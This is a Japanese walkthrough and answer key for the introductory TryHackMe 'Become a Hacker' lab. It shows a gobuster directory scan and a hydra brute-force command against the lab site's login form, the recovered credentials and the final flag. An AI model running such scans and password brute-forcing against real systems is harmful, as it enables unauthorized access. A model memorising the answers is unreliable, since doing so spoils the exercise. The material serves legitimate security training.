概要
TryHackMe「Become a Hacker」のWalkthroughです。
Task1
Q1.Which of the following options better represents the process where you simulate a hacker's actions to find vulnerabilities in a system?Offensive Security,Defensive Security
A.Offensive Security
Task2
Q1.What is the name of the hidden web page you discovered?
Hint.You should be able to find it in this list: sitemap, cgi-bin, login, register, and admin.
gobusterでディレクトリスキャンをします。
gobuster dir --url http://www.onlineshop.thm/ -w /usr/share/wordlists/dirbuster/directory-list.txt
/images (Status: 301) [Size: 313] [-->http://www.onlineshop.thm/images/]
/css (Status: 301) [Size: 310] [-->http://www.onlineshop.thm/css/]
/js (Status: 301) [Size: 309] [-->http://www.onlineshop.thm/js/]
/login (Status: 301) [Size: 314] [-->http://www.onlineshop.thm/login/]
/loginページを発見しました。
A.login
Task3
Q1.What is the secret message that you have discovered?
Hint.Log in with the username admin and the password you discovered.
ログインフォームに対してhydraでブルートフォース攻撃を仕掛けます。
hydra -l admin -P passlist.txt www.onlineshop.thm http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
[80][http-post-form] host: www.onlineshop.thm login: admin password: qwerty
Username: admin,Password: qwertyが分かったのでログインします。
A.born_to_be_a_hacker